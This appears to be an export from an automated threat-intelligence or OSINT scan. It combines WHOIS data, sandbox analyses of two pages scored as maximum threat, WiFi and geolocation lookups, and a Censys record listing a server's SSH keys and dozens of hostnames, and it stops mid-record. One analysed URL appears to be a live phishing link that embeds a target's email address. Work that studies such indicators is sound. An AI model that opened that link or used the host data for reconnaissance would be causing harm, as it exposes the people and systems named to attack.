Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:51:56 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'Curated Live Sessions Preview.htm', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f98_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f98_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_f98_ConnHashTable<3992>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"\n "IsoScope_f98_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f98_IE_EarlyTabStart_0x9a8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f98_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "142.250.191.74:443"\n "185.199.108.153:443"\n "207.58.149.159:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"queryfibre.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "mastermanpublications.com"\n "query.prod.cms.msn.com"\n "queryfibre.github.io"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003992]\n "slps_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00003992]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "CabD0C8.tmp" has type "data"- Location: [%TEMP%\\CabD0C8.tmp]- [targetUID: 00000000-00002780]\n "splice_1_.css" has type "assembler source ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003992]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "~DF4D711661B7A04B97.TMP" has type "data"- Location: [%TEMP%\\~DF4D711661B7A04B97.TMP]- [targetUID: 00000000-00003992]\n "~DF4E28665F3A902F14.TMP" has type "data"- Location: [%TEMP%\\~DF4E28665F3A902F14.TMP]- [targetUID: 00000000-00003992]\n "~DF143E17619557CCD4.TMP" has type "data"- Location: [%TEMP%\\~DF143E17619557CCD4.TMP]- [targetUID: 00000000-00003992]\n "~DF4659A31BF6BFFA2F.TMP" has type "data"- Location: [%TEMP%\\~DF4659A31BF6BFFA2F.TMP]- [targetUID: 00000000-00003992]\n "~DF30EEA2AB51846FC9.TMP" has type "data"- Location: [%TEMP%\\~DF30EEA2AB51846FC9.TMP]- [targetUID: 00000000-00003992]\n "_E0E36BB9-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "RecoveryStore._E0E36BB7-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_E9939342-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_9005BE62-EDB0-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002780]\n "4QKL12T1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4QKL12T1.txt]- [targetUID: 00000000-00003992]\n "FDR3QYMD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FDR3QYMD.txt]- [targetUID: 00000000-00003992]\n "6JPHIXX5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6JPHIXX5.txt]- [targetUID: 00000000-00003992]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "search_1_.json" has type "JSON data"- [targetUID: 00000000-00003992]\n "splice_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: 00000000-00003992]\n "ZN7JGHLC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZN7JGHLC.txt]- [targetUID: 00000000-00003992]\n "CAGRGPOL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CAGRGPOL.txt]- [targetUID: 00000000-00003992]\n "UIT1QO2U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UIT1QO2U.txt]- [targetUID: 00000000-00003992]\n "W8PZ9GMH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W8PZ9GMH.txt]- [targetUID: 00000000-00003992]\n "CabBAEC.tmp" has type "data"- Location: [%TEMP%\\CabBAEC.tmp]- [targetUID: 00000000-00002780]\n "CabBACB.tmp" has type "data"- Location: [%TEMP%\\CabBACB.tmp]- [targetUID: 00000000-00002780]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "urlref_httpqueryfibre.github.iov4splice.css" has type "assembler source ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'HTTPS traffic to "142.250.191.74" on port "443"\n HTTPS traffic to "185.199.108.153" on port "443" | 185.199.108.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | #LG@Vo1P*Service& (Net ID: 00:01:36:26:BA:43) | 34.0544, -118.244 |
| 2023-05-12 02:53:56 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8001::153 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | sntrup761x25519-sha512@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert@broofa.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeia3mp&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#kantonsen%40encoded.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ad0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad0_IE_EarlyTabStart_0x588_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ad0_IESQMMUTEX_0_303"\n "IsoScope_ad0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ad0_ConnHashTable<2768>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2768"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.214.129:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "185.199.111.153:443"\n "69.16.175.10:443"\n "142.250.189.234:443"\n "184.27.80.18:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "m_el_main_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_D809339D-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D809339B-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "X2WYMCV5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X2WYMCV5.txt]- [targetUID: 00000000-00002768]\n "DEW9N13E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DEW9N13E.txt]- [targetUID: 00000000-00003116]\n "_E2C1FED7-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1NX8I2I6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1NX8I2I6.txt]- [targetUID: 00000000-00002768]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "UX69Y2OK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UX69Y2OK.txt]- [targetUID: 00000000-00003116]\n "BQ7YREAH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BQ7YREAH.txt]- [targetUID: 00000000-00003116]\n "~DF7ADEEE89A7F7CB7A.TMP" has type "data"- Location: [%TEMP%\\~DF7ADEEE89A7F7CB7A.TMP]- [targetUID: 00000000-00002768]\n "C1BNT20A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1BNT20A.txt]- [targetUID: 00000000-00002768]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "m_navigationui_1_.js" has 